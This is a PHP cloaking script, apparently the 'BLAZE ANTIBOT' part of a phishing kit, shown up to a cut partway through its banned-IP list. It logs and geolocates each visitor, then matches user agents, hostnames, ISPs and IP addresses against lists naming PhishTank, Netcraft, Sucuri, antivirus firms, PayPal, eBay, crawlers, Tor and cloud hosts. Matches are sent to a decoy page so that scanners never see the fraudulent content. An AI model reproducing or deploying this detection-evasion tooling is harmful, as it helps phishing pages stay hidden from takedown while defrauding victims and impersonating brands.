<?php
date_default_timezone_set("Asia/Jakarta");

function getIP()
{
    if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
        return $_SERVER["HTTP_CLIENT_IP"];
    } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        return $_SERVER["HTTP_X_FORWARDED_FOR"];
    } else {
        return $_SERVER["REMOTE_ADDR"];
    }
}

function getOS()
{
    $oses = array(
        "windows nt 10.0" => "Windows 10",
        "windows nt 6.3" => "Windows 8.1",
        "windows nt 6.2" => "Windows 8",
        "windows nt 6.1" => "Windows 7",
        "windows nt 6.0" => "Windows Vista",
        "windows nt 5.2" => "Windows 2003",
        "windows nt 5.1" => "Windows XP",
        "windows nt 5.0" => "Windows 2000",
        "windows nt 4.0" => "Windows NT 4.0",
        "winnt4.0" => "Windows NT 4.0",
        "winnt 4.0" => "Windows NT",
        "winnt" => "Windows NT",
        "windows 98" => "Windows 98",
        "win98" => "Windows 98",
        "windows 95" => "Windows 95",
        "win95" => "Windows 95",
        "windows phone" => "Windows Phone",
        "windows" => "Unknown Windows OS",
        "android" => "Android",
        "blackberry" => "BlackBerry",
        "os x" => "Mac OS X",
        "ppc mac" => "Power PC Mac",
        "freebsd" => "FreeBSD",
        "ppc" => "Macintosh",
        "linux" => "Linux",
        "debian" => "Debian",
        "sunos" => "Sun Solaris",
        "beos" => "BeOS",
        "apachebench" => "ApacheBench",
        "aix" => "AIX",
        "irix" => "Irix",
        "osf" => "DEC OSF",
        "hp-ux" => "HP-UX",
        "netbsd" => "NetBSD",
        "bsdi" => "BSDi",
        "openbsd" => "OpenBSD",
        "gnu" => "GNU/Linux",
        "unix" => "Unknown Unix OS",
        "symbian" => "Symbian OS",
        "mobileexplorer" => "Mobile Explorer",
        "palmsource" => "Palm",
        "palmscape" => "Palmscape",
        "motorola" => "Motorola",
        "nokia" => "Nokia",
        "palm" => "Palm",
        "iphone" => "Apple iPhone",
        "ipad" => "iPad",
        "ipod" => "Apple iPod Touch",
        "sony" => "Sony Ericsson",
        "ericsson" => "Sony Ericsson",
        "cocoon" => "O2 Cocoon",
        "blazer" => "Treo",
        "lg" => "LG",
        "amoi" => "Amoi",
        "xda" => "XDA",
        "mda" => "MDA",
        "vario" => "Vario",
        "htc" => "HTC",
        "samsung" => "Samsung",
        "sharp" => "Sharp",
        "sie-" => "Siemens",
        "alcatel" => "Alcatel",
        "benq" => "BenQ",
        "ipaq" => "HP iPaq",
        "mot-" => "Motorola",
        "playstation portable" => "PlayStation Portable",
        "playstation 3" => "PlayStation 3",
        "playstation vita" => "PlayStation Vita",
        "hiptop" => "Danger Hiptop",
        "nec-" => "NEC",
        "panasonic" => "Panasonic",
        "philips" => "Philips",
        "sagem" => "Sagem",
        "sanyo" => "Sanyo",
        "spv" => "SPV",
        "zte" => "ZTE",
        "sendo" => "Sendo",
        "nintendo dsi" => "Nintendo DSi",
        "nintendo ds" => "Nintendo DS",
        "nintendo 3ds" => "Nintendo 3DS",
        "wii" => "Nintendo Wii",
        "open web" => "Open Web",
        "openweb" => "OpenWeb",
        "SymbianOS" => "SymbianOS",
        "elaine" => "Palm",
        "series60" => "Symbian S60",
        "windows ce" => "Windows CE",
        "digital paths" => "Digital Paths",
        "avantgo" => "AvantGo",
        "xiino" => "Xiino",
        "novarra" => "Novarra Transcoder",
        "vodafone" => "Vodafone",
        "docomo" => "NTT DoCoMo",
        "o2" => "O2",
        "mobile" => "Generic Mobile",
        "wireless" => "Generic Mobile",
        "j2me" => "Generic Mobile",
        "midp" => "Generic Mobile",
        "cldc" => "Generic Mobile",
        "up.link" => "Generic Mobile",
        "up.browser" => "Generic Mobile",
        "smartphone" => "Generic Mobile",
        "cellphone" => "Generic Mobile"
    );
    foreach ($oses as $os => $preg_pattern) {
        if (preg_match("/" . $preg_pattern . "/", $_SERVER["HTTP_USER_AGENT"])) {
            return $os;
        }
    }
    return "Unknown OS";
}

function getBrowser()
{
    $browser_array = array(
        "OPR" => "Opera",
        "Flock" => "Flock",
        "Edge" => "Spartan",
        "Chrome" => "Chrome",
        "Opera.*?Version" => "Opera",
        "Opera" => "Opera",
        "MSIE" => "Internet Explorer",
        "Internet Explorer" => "Internet Explorer",
        "Trident.* rv" => "Internet Explorer",
        "Shiira" => "Shiira",
        "Firefox" => "Firefox",
        "Chimera" => "Chimera",
        "Phoenix" => "Phoenix",
        "Firebird" => "Firebird",
        "Camino" => "Camino",
        "Netscape" => "Netscape",
        "OmniWeb" => "OmniWeb",
        "Safari" => "Safari",
        "Mozilla" => "Mozilla",
        "Konqueror" => "Konqueror",
        "icab" => "iCab",
        "Lynx" => "Lynx",
        "Links" => "Links",
        "hotjava" => "HotJava",
        "amaya" => "Amaya",
        "IBrowse" => "IBrowse",
        "Maxthon" => "Maxthon",
        "Ubuntu" => "Ubuntu Web Browser",
        "obigo" => "Obigo",
        "netfront" => "Netfront Browser",
        "openwave" => "Openwave Browser",
        "mobilexplorer" => "Mobile Explorer",
        "operamini" => "Opera Mini",
        "opera mini" => "Opera Mini",
        "opera mobi" => "Opera Mobile",
        "fennec" => "Firefox Mobile",
    );
    foreach ($browser_array as $regex => $browser) {
        if (preg_match("/" . $regex . "/", $_SERVER["HTTP_USER_AGENT"])) {
            return $browser;
        }
    }
    return "Unknown Browser";
}

function whois()
{
    return @json_decode(file_get_contents("http://ip-api.com/json/" . getIp()), true);
}

function logger($data, $reason)
{
    $today = date('l, d F H H:i:s');
    $ip = getIP();
    $visit = whois();
    $os = getOS();
    $br = getBrowser();
    $fopen = fopen("./bot_logs.txt", "a+") or die("Unable to open file!");
    $body = "🔥 [ BLAZE ANTIBOT ] 🔥";
    $body .= "REASON: {$reason} | CODE: " . uniqid() . "\n";
    $body .= "BOT: {$data}\n";
    $body .= "DATE: {$today}\n";
    $body .= "IP Address: {$ip}" . "\n";
    $body .= "COUNTRY: {$visit['country']}" . "\n";
    $body .= "REGION: {$visit['city']}" . "\n";
    $body .= "ORGANISATION: {$visit['isp']}" . "\n";
    $body .= "ASN: {$visit['as']}\n";
    $body .= "HOSTNAME: " . gethostbyaddr($ip) . "\n";
    $body .= "OS: {$os}\n";
    $body .= "BROWSER: {$br}\n";
    $body .= "USER AGENT: {$_SERVER['HTTP_USER_AGENT']}\n";
    fwrite($fopen, $body);
    fclose($fopen);
}

$hostname = gethostbyaddr($_SERVER["REMOTE_ADDR"]); $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); $visit = whois();
$asn = $visit["as"]; $isp = $visit["isp"];

$badHosts = array(
    "colocrossing.com",
    "QuerySeekerSpider",
    ":bot",
    "samsung-sgh-e250",
    "R6_CommentReader",
    "pgp key agent",
    "w3mir",
    "roadhouse",
    "linkalarm",
    "jakarta",
    "Feedfetcher-Google",
    "spider",
    "minirank",
    "blog",
    "web wombat",
    "oracle",
    "hku www octopus",
    "scooter",
    "link validator",
    "picosearch",
    "stelkom.net",
    "wget",
    "voyager",
    "informant",
    "EBAY",
    "bingbot",
    "is74.ru",
    "shore.net",
    "xget",
    "surriel.com",
    "omni",
    "Http Crawler",
    "gcreep",
    "lbot",
    "miva",
    "Dr.Web",
    "cyberinfo",
    "orb search",
    "wapproxy",
    "Feedly",
    "apercite",
    "Sogou web spider",
    "silk",
    "search.",
    "titan",
    "digitalcourage.de",
    "weblogmonitor",
    "aruba",
    "untrusted",
    "msnbot",
    "dr.web",
    "xift",
    "nutch",
    "deepindex",
    "vbot",
    "aboutusbot",
    "wavefire",
    "whizbang",
    "yandexbot",
    "grabber",
    "atn",
    "adsbot-google",
    "aplix",
    "multitext",
    "bingpreview",
    "pagepeeker",
    "pogodak",
    "pagebull",
    "gazz",
    "image.kapsi.net",
    "scoutjet",
    "monitis.com",
    "web hopper",
    "imagelock",
    "instagram",
    "acoi",
    "mj12",
    "GrapeshotCrawler",
    "mediapartners",
    "SMXCrawler",
    "scrubby",
    "adaxas",
    "aportworm",
    "griffon",
    "VoilaBot",
    "ShowyouBot",
    "CCBot",
    "internet shinchakubin",
    "anzwers",
    "robbie",
    "openintelligencedata",
    "PaperLiBot",
    "acoonbot",
    "curl",
    "TweetedTimes Bot",
    "cassandra",
    "arachnophilia",
    "blo.",
    "unknown.telecom.gomel.by",
    "hkuwwwoctopus",
    "TweetedTimesBot",
    "cloudflare",
    "phantomjs",
    "calif",
    "ucsd",
    "phishtank",
    "t-h-u-n-d-e-r-s-t-o-n-e",
    "jack",
    "ezresult",
    "mbot",
    "ebot",
    "legs",
    "csci",
    "evliya celebi",
    "UnwindFetchor",
    "poirot",
    "nbot",
    "updated",
    "altavista",
    "webvac",
    "asked",
    "golem",
    "MaxPointCrawler",
    "linkvalidator",
    "rambler",
    "pompos",
    "webzinger",
    "gulliver",
    "helix",
    "webhopper",
    "calyxinstitute",
    "download express",
    "ovh.net",
    "nokia6682",
    "larbin",
    "hosting",
    "p3pwgdsn",
    "appie",
    "webfoot",
    "depspid",
    "webcopy",
    "supersnooper",
    "msn",
    "zippp",
    "pimptrain",
    "geosr",
    "URLAppendBot",
    "dreamhost",
    "mailshell",
    "(bot",
    "nec-meshexplorer",
    "acoon",
    "theophrastus",
    "zipcommander",
    "noyona",
    "Macintosh",
    "netcartawebmapengine",
    "fetchrover",
    "panscient",
    "applebot",
    "TencentTraveler",
    "kdd-explorer",
    "bilbo",
    "cusco",
    "hilfe-veripayed.com",
    "facebook",
    "wanderer",
    "ah-ha.com",
    "salty",
    "weblinker",
    "hotmail!",
    "raven search",
    "ip3000",
    "Mediapartners-Google",
    "packrat",
    "4seohuntbot",
    "outlook",
    "presto",
    "httrack",
    "microsofturlcontrol",
    "cymru.com",
    "BazQuxBot",
    "spyder",
    "e-collector",
    "nomad",
    "feedfetcher",
    "valkyrie",
    "fetcher6-2.go.mail.ru",
    "avg",
    "softlayer",
    "aretha",
    "baboom",
    "Python-urllib",
    "picsearch",
    "wwwster",
    "X11",
    "blaiz",
    "cienciaficcion",
    "titin",
    "externalhit",
    "vultr",
    "netresearchserver",
    "webbandit",
    "Jobboerse Crawler ",
    "w3m2",
    "lighthouse",
    "PulseCrawler",
    "roadrunner",
    "suke",
    "netpilot",
    "searchprocess",
    "googlebot",
    "arale",
    "bot.",
    "findlinks",
    "arks",
    "sitevalet",
    "voyager/",
    "triolan.net",
    "myweb",
    "nationaldirectory",
    "AhrefsBot",
    "compatible",
    "toutatis",
    "trendmicro",
    "paypal",
    "hyper-decontextualizer",
    "mediafox",
    "bannana_bot",
    "mapoftheinternet",
    "spinner",
    "zteopen",
    "crawl",
    "bradley",
    "netcraft",
    "pinpoint",
    "security",
    "bigbrother",
    "patric",
    "webwalk",
    "SPRO-NET-209-19-128",
    "internetshinchakubin",
    "gsa-crawler",
    "motor",
    "charlotte",
    "shark",
    "windows 95",
    "dieblindekuh",
    "labelgrabber",
    "araneo",
    "htmlindex",
    "Kraken",
    "crawlconvera",
    "yeti",
    "jetbot",
    "ditto",
    "dyn.plus.net",
    "webcore",
    "sbider",
    "butterfly",
    "Ezooms",
    "metauri",
    "simtccflow1.etn.com",
    "go-http-client",
    "webcatcher",
    "ananzi",
    "seek",
    "sven",
    "abacho",
    "amzn_assoc",
    "Yahoo! Slurp",
    "urlcheck",
    "steeler/",
    "comrise.ru",
    "zao",
    "hinet.net",
    "lssrocketcrawler",
    "shopwiki",
    "html index",
    "lachesis",
    "havindex",
    "007ac9",
    "iltrovatore",
    "phantom",
    "online-domain-tools",
    "Googlebot",
    "staircaseirony",
    "robozilla",
    "tutorgig",
    "worldlight",
    "NetSeer crawler",
    "delorie",
    "starnet.md",
    "drweb",
    "html_analyzer",
    "sucuri.net",
    "grokkit-crawler",
    "occam",
    "azure",
    "hubater",
    "apache-httpclient",
    "phising",
    "192.comagent",
    "safebrowsing",
    "reverseshorturl",
    "_bot",
    "israeli-search",
    "digger",
    "osis-project",
    "outlook!",
    "200pleasebot",
    "apple.com",
    "urlredirectresolver",
    "pear.",
    "homerweb",
    "atlocal",
    "nzexplorer",
    "abot",
    "spam",
    "webmirror",
    "e-active.nl",
    "Windows XP",
    "webwombat",
    "yahoo",
    "wauuu",
    "ibm_planetwide",
    "iconsurf",
    "indexer",
    "webmonkey",
    "Lighthouse",
    "cfetch",
    "Spinn3r",
    "ybot",
    "kyivstar.net",
    "008",
    "baiduspider",
    "walker",
    "incywincy",
    "camehttps",
    "lycos",
    "heritrix",
    "slurp",
    "yodao",
    "eset",
    "mwd.search",
    "aladin",
    "nokia6682/",
    "biglotron",
    "YoudaoBot",
    "abrave spider",
    "libwww",
    "grapnel",
    "sidewinder",
    "marvin",
    "headless",
    "yanga",
    "robofox",
    "SPRO-NET-207-70-0",
    "webreaper",
    "addthis.com",
    "gralon",
    "preview",
    "fish search",
    "augurfind",
    "asterias",
    "unchaos",
    "quicklook",
    "moose",
    "ia_archiver",
    "hotmail",
    "google",
    "bruuk.sk",
    "muncher",
    "objectssearch",
    "twisted",
    "telegram",
    "SISTRIX Crawler",
    "tarantula",
    "python",
    "voyager-hc",
    "ahrefsbot",
    "aboundexbot",
    "baidu",
    "Butterfly",
    "messagelabs",
    "mattie",
    "trident",
    "avast",
    "muscatferret",
    "webstolperer",
    "woriobot",
    "Exabot",
    "ferret",
    "najdi",
    "sphere",
    "htdig",
    "bot/",
    "virus",
    "minsktelecom.by",
    "architext",
    "Sogouwebspider",
    "tkwww",
    "aspseek",
    "scanurl",
    "arabot",
    "BitDefender",
    "majestic12",
    "PercolateCrawler",
    "netsparker",
    "msn!",
    "mcafee",
    "whowhere",
    "anonymizer",
    "gromit",
    "esther",
    "url check",
    "peregrinator",
    "javabee",
    "combine",
    "mpdedicated.com",
    "geturl",
    "avira",
    "mercator",
    "weblog monitor",
    "seamonkey",
    "sysms.net",
    "safesurfingwidget",
    "jetbrains",
    "amagit.com",
    "churl",
    "grub",
    "cyveillance",
    "page_verifier",
    "xenu",
    "alkaline",
    "netmechanic",
    "web core",
    "icoreservice",
    "progtech.ru",
    "ebiness",
    "ichiro",
    "daumoa",
    "simmany",
    "fishsearch",
    "w3c_validator",
    "R6_FeedFetcher",
    "whatsapp",
    "YandexBot",
    "80legs.com/webcrawler",
    "sitetech-rover",
    "btcentralplus.com",
    "dalvik",
    "rbot",
    "genieknows",
    "Genieo",
    "dwcp",
    "uptimerobot.com",
    "privoxy",
    "torservers",
    "felixide",
    "big brother",
    "duckduck",
    "50.nu",
    "mnogosearch",
    "smartwit",
    "amibot",
    "nederland.zoek",
    "populariconoclast",
    "del.icio.us",
    "PrintfulBot",
    "-bot",
    "tor-exit",
    "senrigan",
    "site valet",
    "plumtreewebaccessor",
    "wwwc",
    "dtaagent",
    "bloodhound",
    "emacs-w3 search engine",
    "as9105.com",
    "funnelweb",
    "knowledge",
    "admantx",
    "downloadexpress",
    "pack rat",
    "snooper",
    "deweb",
    "yahoo!",
    "emacs-w3searchengine",
    "intelliagent",
    "sylera",
    "sl-reverse.com",
    "avant",
    "linkdexbot",
    "gmetrix",
    "teledata-fttx.de",
    "sogou",
    "piranha",
    "crawler",
    "Baiduspider",
    "mantraagent",
    "a6-indexer",
    "echo blinde kuh",
    "sohu",
    "cmc",
    "annotate",
    "collective",
    "poppelsdorf",
    "antbot",
    "merzscope",
    "ebay",
    "jabber",
    "docomo",
    "obot",
    "dmoz",
    "amuri.net",
    "duckduckbot",
    "vagabondo",
    "websnarf",
    "blackwidow",
    "publisher",
    "sift",
    "ahoy",
    "comagent",
    "windows xp",
    "parked.factioninc.com",
    "dbot",
    "wallpaper",
    "mon.itor.us",
    "virustotal",
    "analytics",
    "python-requests",
    "kretrieve",
    "templeton",
    "accoona",
    "kilroy",
    "MJ12bot",
    "yandex",
    "SearchmetricsBot",
    "pegasus",
    "tach black widow",
    "/teoma",
    "bdfetch",
    "java",
    "opendns",
    "bot",
    "newscan-online",
    "moget",
    "fouineur",
    "BomboraBot",
    "parasite",
    "pgpkeyagent",
    "popular iconoclast",
    "cloud",
    "goforit",
    "jumpstation",
    "inspectorweb",
    "sg-scout",
    "wildferret",
    "partnersite",
    "aranha",
    "pycurl",
    "ncsa beta",
    "linkscan",
    "above",
    "websitepulse",
    "ivia",
    "poppi",
    "360spider",
    "infobee",
    "miniature",
    "pbot",
    "ipredator",
    "phpdig",
    "hicoria.com",
    "windows 98",
    "googletranslate",
    "ejupiter",
    "openfind",
    "Yahoo!Slurp",
    "baypup",
    "speedfind",
    ".bot",
    "psycheclone",
    "webwatch",
    "tbot",
    "ask24",
    "hbot",
    "nodemeter.net",
    "zbot",
    "/bot",
    "xirq",
    "Trident",
    "computingsite",
    "evliyacelebi",
    "tlh.ro",
    "webquest",
    "teoma",
    "fireball",
    "twitter",
    "surfnomore",
    "rules",
    "victoria",
    "urlresolver",
    "zao/",
    "nhse",
    "TweetmemeBot",
    "pageboy",
    "snappy",
    "spbot",
    "tachblackwidow",
    "booch",
    "hamahakki",
    "nameprotect",
    "ingrid",
    "magpie",
    "proximic",
    "lockon",
    "cisco",
    "inspector web",
    "vision-search",
    "adressendeutschland",
    "skymob.com",
    "mozilla",
    "ah-ha",
    "sygol",
    "siteexplorer",
    "microsoft url control",
    "atomz",
    "road runner",
    "verticrawl",
    "....",
    "sogou-test-spider",
    "harvest",
    "kbot",
    "nazilla",
    "prcdn.net",
    "versanet.de",
    "fangcrawl",
    "anthill",
    "steeler",
    "acunetix",
    "InAGist",
    "hostinger",
    "ravensearch",
    "msnbot-media",
    "SiteChecker",
    "orange-labs",
    "opentext",
    "getterroboplus",
    "monster",
    "antivirus",
    "ncsabeta",
    "sna-",
    "piltdownman",
    "die blinde kuh",
    "speedtravel",
    "sphider",
    "htmlgobble",
    "CL0NA",
    "felix ide",
    "askaboutoil",
    "phish",
    "yahooSeeker",
    "katipo",
    "merlinkbot",
    "agada",
    "ebingbong",
    "fido",
    "amznkassocbot",
    "netscoop",
    "DomainAppender",
    "wild ferret",
    "metauri.com",
    "linode.com",
    "facebookexternalhit",
    "accelobot",
    "kototoi",
    "roach",
    "glx",
    "inktomisearch.com",
    "site searcher",
    "pioneer",
    "NetSeercrawler",
    "exabot",
    "upcloud.host",
    "Y!J-BRW",
    "shaihulud",
    "udmsearch",
    "Twitterbot",
    "dreampassport",
    "open text",
    "Cliqzbot",
    "boitho",
    "suntek",
    "anzwerscrawl",
    "alexabot",
    "szukacz",
    "volcano",
    "neofonie",
    "twiceler",
    "sbot",
    "marvin/",
    "iron33",
    "t-rex",
    "proxy",
    "NING",
    "bjaaland",
    "NetcraftSurveyAgent",
    "magpie-crawler",
    "orbsearch",
    "semanticdiscovery",
    "sleek",
    "sitesearcher",
    "downnotifier",
    "ccubee",
    "falcon",
    "googlebot.com",
    "translate",
    "clamav",
    "lwp",
    "backrub",
    "zyborg",
    "weblayers",
    "netcarta webmap engine",
    "SISTRIXCrawler",
    "anonymizing-proxy"
);
foreach ($badHosts as $badHost) {
    if (stripos($_SERVER["HTTP_USER_AGENT"], $badHost)) {
        logger($badHost, "BOT USERAGENT");
        die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
    }
}
$badISPs = array(
    "GoDaddy.com, LLC",
    "SiteAdvisor",
    "Google Cloud",
    "SC Rusnano",
    "University of",
    "Daniel James Austin",
    "dreamhost",
    "EGIHosting",
    "Yahoo",
    "McAfee",
    "Host",
    "Nobis Technology Group",
    "LinkGrid LLC",
    "softlayer",
    "Universidade Federal do Rio de Janeiro",
    "Twitter",
    "9New Network Inc",
    "TalkTalk",
    "Teksavvy Solutions Inc.",
    "avirasoft",
    "Westnet",
    "Whitelabel IT Solutions Corp",
    "University",
    "this.is.a.tor.node.xmission.com",
    "France Telecom S.A.",
    "Snab-Inform Private Enterprise",
    "Apexis",
    "Hostalia",
    "Bell Canada",
    "tor.piratenpartei-nrw.de",
    "GigeNET",
    "AntiVirus",
    "QualityNetwork",
    "Choopa",
    "UK Dedicated Servers Limited",
    "Internet-Pro",
    "Cisco Systems Inc.",
    "Telegram Messenger Network",
    "British Telecommunications PLC",
    "PSINet Inc.",
    "Host1Plus Cloud Servers",
    "clicktargetdevelopment.com",
    "Iomart Hosting Limited",
    "colocrossing.com",
    "Hosting Solution",
    "Digital Energy Technologies Limited",
    "Facebook",
    "ImOn Communications, LLC",
    "Iomart Hosting Ltd",
    "Blue Coat Systems",
    "Apexis AG",
    "Bitdefender",
    "DedFiberCo",
    "Fortinet",
    "Schulte Consulting LLC",
    "ESET spol. s r.o.",
    "Spectrum",
    "SURFnet",
    "Virtual1 Limited",
    "WhatsApp",
    "noisetor",
    "CloudVPN",
    "Vist On-Line Ltd",
    "Host1Plus",
    "Digital Domain",
    "LukMAN Multimedia Sp. z o.o",
    "Redpill Linpro AS",
    "LogicWeb",
    "Hosteros LLC",
    "PHPNET Hosting Services",
    "Unus Inc.",
    "Sectoor",
    "Quintex Alliance Consulting",
    "Wintek Corporation",
    "ITCOM Shpk",
    "Hostwinds",
    "Versaweb",
    "Apple Inc.",
    "PIPEX-BLOCK1",
    "ExpressVPN",
    "trendmicro",
    "Comodo",
    "HighWinds Network",
    "Kaspersky",
    "Akamai",
    "crawl",
    "The University of Tokyo",
    "Junk Email Filter Inc.",
    "this.is.a.tor.exit-node.net",
    "M-net",
    "MYX Group LLC",
    "TalkTalk Communications Limited",
    "Private Customer",
    "Netprotect SRL",
    "proxy",
    "Total Server Solutions",
    "phishtank.com",
    "SoftLayer",
    "cloudflare",
    "Wowrack.com",
    "Top Level Hosting SRL",
    "CloudFlare",
    "OVH",
    "Internet Security - TC",
    "Static IP Assignment",
    "Glenayre Electronics Inc.",
    "Involta",
    "Level 3 Communications",
    "NewMedia Express",
    "Global Data Networks LLC",
    "Tahoe Internet Exchange (TahoeIX)",
    "london-tor.mooo.com",
    "vultr.com",
    "Linode",
    "Sungard Network Solutions",
    "Udasha",
    "Long Thrive",
    "Claro Dominican Republic",
    "exit-01a.noisetor.net",
    "OVH Hosting Inc.",
    "pacbell.net",
    "crawler",
    "tor-exit",
    "Nine Internet Solutions AG",
    "UPC Romania Bucuresti",
    "healingpathsolutions.com",
    "Microsoft",
    "ovh.net",
    "Microsoft Corporation",
    "VPSmalaysia.com.my",
    "PlusNet Technologies Ltd",
    "RedSwitches Pty",
    "Chelyabinsk-Signal LLC",
    "Liquid Web",
    "QuadraNet",
    "Creative Thought Inc.",
    "Vultr Holdings LLC",
    "Orange Polska Spolka Akcyjna",
    "calyxinstitute",
    "rima-tde.net",
    "Host Sailor Ltd.",
    "GoDaddy",
    "cyveillance",
    "noisetor.net",
    "SoftLayer Technologies",
    "AVAST Software s.r.o.",
    "Fireeye",
    "XO Communications",
    "Eir Broadband",
    "roamsite.com",
    "Time Warner Cable Internet LLC",
    "Flokinet Ltd",
    "Online SAS",
    "B2 Net Solutions",
    "torservers",
    "Virtual Employee Pvt Ltd",
    "LukMAN",
    "cpanel66.proisp.no",
    "NForce Entertainment B.V.",
    "CachedNet",
    "yahoo",
    "Petersburg Internet Network Ltd.",
    "Cisco Systems",
    "Online S.A.S.",
    "Host Europe GmbH",
    "Barracuda Networks",
    "Symantec",
    "Computer Problem Solving",
    "www16.mailshell.com",
    "Lixux OU",
    "static.spro.net",
    "ChinaNet Fujian Province Network",
    "Vertical Telecoms Broadband Networks and Internet Provider",
    "enom",
    "RamNode",
    "Solution Pro",
    "Rackspace",
    "Content Delivery Network Ltd",
    "OJSC Oao Tattelecom",
    "Zayo Bandwidth",
    "sucuri.net",
    "Parrukatu",
    "IPVanish",
    "SunGard Availability Services LP",
    "GANDI SAS",
    "Mozilla",
    "Bitfolk",
    "Art Matrix - Lightlink Inc.",
    "Psychz",
    "NFOrce Entertainment B.V.",
    "Trustwave Holdings Inc",
    "antivirus",
    "Infosphere",
    "ZenLayer",
    "Peak 10",
    "Tehnologii Budushego LLC",
    "Onavo Mobile Ltd",
    "exit0.liskov.tor-relays.net",
    "Amazon Technologies Inc.",
    "Xs4all Internet BV",
    "Palo Alto Networks",
    "Barracuda Networks Inc.",
    "University of Newcastle upon Tyne",
    "A100 ROW",
    "Web Hosting Solutions",
    "HostUS",
    "Instagram",
    "Incapsula Inc",
    "Yahoo! Inc.",
    "Hosting",
    "netcraft",
    "DigitalOcean",
    "Eonix Corporation",
    "ScanSafe Services",
    "Flokinet",
    "ServerMania",
    "LG DACOM",
    "HEG US",
    "Simpli Networks LLC",
    "Blazing SEO",
    "tor-node.com",
    "Internap Network Services Corporation",
    "Digital Ocean",
    "DME Hosting LLC",
    "Complete Internet Access",
    "Voxility",
    "Sony",
    "013 NetVision",
    "trustwave",
    "Baidu",
    "ebbs.healingpathsolutions.com",
    "p3pwgdsn",
    "Oracle",
    "Avira",
    "The Calyx Institute",
    "Team Technologies LLC",
    "Dosarrest",
    "TerraTransit AG",
    "hosttech GmbH",
    "Choopa, LLC",
    "Inter Connects Inc",
    "Public facing services",
    "msnbot",
    "comodo",
    "Mainloop",
    "Madgenius.com",
    "Cubenode System SL",
    "centralnic",
    "Security",
    "Dataline Ltd",
    "Return Path Inc.",
    "Amazon Data Services NoVa",
    "Quasi Networks LTD",
    "M247 LTD Frankfurt Infrastructure",
    "Plusnet",
    "Zscaler",
    "netpilot",
    "PathsConnect",
    "SecuredConnectivity.net",
    "Master Internet",
    "Merit Network",
    "Eircom Customer Assignment",
    "spider.clicktargetdevelopment.com",
    "IQ PL Sp. z o.o.",
    "badware",
    "Global Perfomance",
    "PrivateSystems Networks",
    "tor.tocici.com",
    "London Wires Ltd.",
    "Network and Information Technology Limited",
    "eSecureData",
    "HostDime.com",
    "Fastly",
    "Customer Network",
    "Ventelo Wholesale",
    "tfbnw.net",
    "Server",
    "phishtank",
    "Server Plan S.r.l.",
    "Inktomi Corporation",
    "Scaleway",
    "ColoUp",
    "Nobis Technology Group LLC",
    "Datacamp Limited",
    "VI Na Host Co. Ltd",
    "VNET a.s.",
    "Digiweb ltd",
    "Prescient Software",
    "ebay",
    "Intersoft Internet",
    "ClientID",
    "University of Virginia",
    "paypal",
    "Solar VPS",
    "Psychz Networks",
    "Hetzner Online",
    "phishing",
    "Barracuda",
    "Secure Internet",
    "Private IP Address LAN",
    "Spark New Zealand Trading Ltd",
    "SurfControl",
    "tpnet.pl",
    "JSC ER-Telecom Holding",
    "Internet Customers"
);
foreach ($badISPs as $badISP) {
    if (preg_match("/" . $badISP . "/i", $isp)) {
        logger($badISP, "BOT ISP");
        die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
    }
}

$blocked_words = array("deltainfocom", "dnsserverhosting", "Java/1.6.0_22", "Go-http-client/1.1", "drweb", "Dr.Web", "hostinger", "scanurl", "above", "level3", "level", "involta", "SOLUTIONPRO-NET", "SOLUTION", "SolutionPro", "SPRO-NET-206-80-96", "SPRO-NET-207-70-0", "SPRO-NET-209-19-128", "LVLT-STATIC-4-14-16", "americanexpress", "google", "softlayer", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit", "paypal", "facebook", "ebay", "Baiduspider", "ia_archiver", "R6_FeedFetcher", "NetcraftSurveyAgent", "Sogou web spider", "PrintfulBot", "UnwindFetchor", "urlresolver", "Butterfly", "TweetmemeBot", "PaperLiBot", "MJ12bot", "AhrefsBot", "Exabot", "Ezooms", "YandexBot", "SearchmetricsBot", "picsearch", "TweetedTimes Bot", "QuerySeekerSpider", "ShowyouBot", "woriobot", "merlinkbot", "BazQuxBot", "Kraken", "SISTRIX Crawler", "R6_CommentReader", "magpie-crawler", "GrapeshotCrawler", "PercolateCrawler", "MaxPointCrawler", "R6_FeedFetcher", "NetSeer crawler", "grokkit-crawler", "SMXCrawler", "PulseCrawler", "Y!J-BRW", "datasift", "80legs.com/webcrawler", "Mediapartners-Google", "Spinn3r", "InAGist", "Python-urllib", "python-requests", "NING", "TencentTraveler", "Feedfetcher-Google", "mon.itor.us", "p3pwgdsn", "sucuri.net", "messagelabs", "torservers", "trendmicro", "spbot", "Feedly", "bot", "curl", "spider", "crawler");
foreach ($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        logger($word, "BOT DETECTED");
        die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
    }
}

$bannedIP = array(
    "1.9.2.13",
    "1.9.2.15",
    "103.205.140.227",
    "103.248.172.42",
    "104.197.5.72",
    "104.223.127.208",
    "104.62.2.60",
    "104.83.233.198",
    "107.178.194.234",
    "107.178.194.64",
    "107.189.10.190",
    "107.189.10.42",
    "108.161.29.60",
    "113.116.51.127",
    "115.238.55.18",
    "119.97.214.138",
    "13.112.251.210",
    "134.209.142.35",
    "136.243.111.17 ",
    "136.243.111.17",
    "138.197.207.*",
    "138.197.207.147",
    "138.201.202.232",
    "143.3.53.161",
    "145.239.156.71",
    "145.239.156.89",
    "150.70.168.35",
    "150.70.188.167",
    "154.127.57.30",
    "159.203.0.156",
    "159.65.210.36",
    "162.224.156.32",
    "162.243.128.197",
    "162.243.187.126",
    "162.243.69.215",
    "163.172.174.24",
    "165.227.0.128",
    "165.227.39.194",
    "165.231.142.36",
    "169.38.85.109",
    "170.250.139.48",
    "173.230.147.44",
    "173.239.230.97",
    "173.239.240.147",
    "177.39.232.144",
    "178.17.170.156",
    "185.104.120.4",
    "185.104.186.168",
    "185.130.184.209",
    "185.217.171.12",
    "185.220.101.26",
    "185.220.70.151",
    "185.229.190.140",
    "185.236.201.148",
    "185.28.20.243",
    "188.166.63.71",
    "192.36.27.7",
    "194.99.105.99",
    "196.251.250.29",
    "196.52.84.81",
    "198.148.78.133",
    "202.143.148.61",
    "204.101.161.159",
    "204.13.201.137",
    "205.251.148.186",
    "208.87.233.140",
    "212.83.139.219",
    "212.83.170.209",
    "212.92.117.5",
    "216.164.117.239",
    "217.16.26.166",
    "217.182.168.178",
    "217.96.188.74",
    "217.96.197.246",
